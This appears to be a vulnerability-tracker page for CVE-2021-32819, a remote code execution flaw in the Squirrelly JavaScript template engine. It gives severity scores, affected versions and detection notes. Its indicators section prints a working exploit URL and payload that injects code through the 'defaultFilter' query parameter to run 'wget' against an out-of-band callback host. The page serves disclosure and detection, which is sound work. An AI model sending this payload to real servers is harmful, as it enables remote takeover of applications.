cbcvebase.
CVE-2021-32819
published 2021-05-14

CVE-2021-32819: Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine…

PriorityP187high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
59.84%
99.0th percentile
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.

Affected

3 ranges
VendorProductVersion rangeFixed in
squirrellysquirrelly
squirrellysquirrelly>= 0 < 9.0.09.0.0
squirrellyjssquirrelly>= 9.0.0 < 9.0.09.0.0

Detection & IOCsextracted from sources · hover to see the quote

url/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//
commandvar require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http://{{interactsh-url}}');
  • Exploit arrives as a GET request with query parameters 'Express', 'autoEscape', and 'defaultFilter'; the 'defaultFilter' parameter carries a JavaScript injection payload that breaks out of the template context and invokes child_process.exec via global.process.mainModule.constructor._load.
  • Successful exploitation can be confirmed via an out-of-band HTTP callback (OAST); look for an inbound HTTP request carrying 'User-Agent: Wget' originating from the target server.
  • The attack overwrites internal Squirrelly configuration options (autoEscape, defaultFilter) through the Express render API query string, enabling template sandbox escape and RCE.
  • ·The vulnerability affects Squirrelly versions up to and including 8.0.8; version 9.0.0 contains the fix. Detections should be scoped to deployments running affected versions.
  • ·Exploitation requires the target application to expose user-controlled data to the Express render API query string (e.g., passing req.query directly as template locals), which is an application-level configuration issue.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck8.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.